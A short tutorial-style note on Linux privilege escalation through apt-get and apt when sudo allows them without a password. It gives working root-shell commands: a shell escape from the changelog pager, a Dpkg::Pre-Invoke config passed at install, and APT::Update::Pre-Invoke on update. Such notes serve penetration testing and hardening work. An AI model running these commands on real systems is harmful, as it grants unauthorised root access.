apt-get – Privilege escalation
apt-get can be used to escalate privileges when sudo is allowed without password.
How to
1. check the permissions this user has
- sudo -l
We can see that /usr/bin/apt-get is allowed (NOPASSWD)
2. get into changelog documentation
- sudo apt-get changelog apt
3. At the bottom type into change to /bin/bash since this document has been opened as root, seems to be “less” Linux utility.
- !/bin/bash
- <enter>
After that you immediately change to root log in.
Using apt-get & apt update for privilege escalation
(For this to work the target package (e.g., sl) must not be installed.)
- TF=$(mktemp)
- echo ‘Dpkg::Pre-Invoke {“/bin/sh;false”}’ > $TF
- sudo apt-get install -c $TF sl
How to
1. Having NOPASSWD rights
- sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
- whoami
If you type exit the apt-get update command starts to do its job.
2. using apt
- sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash
For using either apt or apt-get you need sudo access.
sudo -l